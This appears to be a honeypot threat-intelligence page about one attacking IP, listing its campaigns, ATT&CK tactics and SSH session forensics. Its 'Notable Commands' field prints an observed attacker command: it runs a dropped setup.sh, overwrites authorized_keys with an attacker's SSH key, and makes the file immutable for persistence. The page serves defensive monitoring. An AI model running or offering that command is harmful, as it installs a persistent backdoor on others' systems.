← Back to feed
Location
🇬🇧 GB
ASN
AS209605 · UAB Host Baltic
Cloud Provider
—
Total Events
39
Average by volume
Agent Count
2
First / Last Seen
2026-06-16 15:53 — 2026-06-16 23:52
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Defense Evasion
Discovery
External Corroboration
Blocklist.de
blocklist_de:reported
Campaigns
Multi-Agent Scan
SCAN
Active
medium
15 IPs
2570 events
2026-05-13 — ongoing · 15 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on Linode. Scanning the same …
Multi-Agent Scan
SCAN
Active
medium
58 IPs
30761 events
2026-04-07 — ongoing · 58 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
28 IPs
72533 events
2026-03-29 — ongoing · 28 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
67 IPs
220958 events
2026-03-21 — ongoing · 67 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
62 IPs
212856 events
2026-03-21 — ongoing · 62 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
65 IPs
238556 events
2026-03-21 — ongoing · 65 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
61 IPs
30086 events
2026-03-21 — ongoing · 61 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
2 IPs
484 events
2026-03-02 — ongoing · 2 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
HASSH 0a07365cc01f… — SSH-2.0-Go (53 IPs, 22 countries)
HASSH
Active
high
🇳🇱 NL
53 IPs
702503 events
ftp:bruteforcessh:bruteforce
2026-02-22 — ongoing · 53 IPs are running an identical SSH client (HASSH fingerprint 0a07365cc01f…). Top network: Pfcloud UG (haftungsbeschrankt) (AS51396). Geographic …
Session Forensics
Sessions
3 (3 with login)
Avg Depth Score
0.67
Commands Executed
1
Files Downloaded
1
Notable Commands
- chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a
Fingerprints
HASSH
SSH Client
Evidence Timeline
Malware Dropper
cfbea46ee375
LOGIN
1
1
1
100%
Loading events...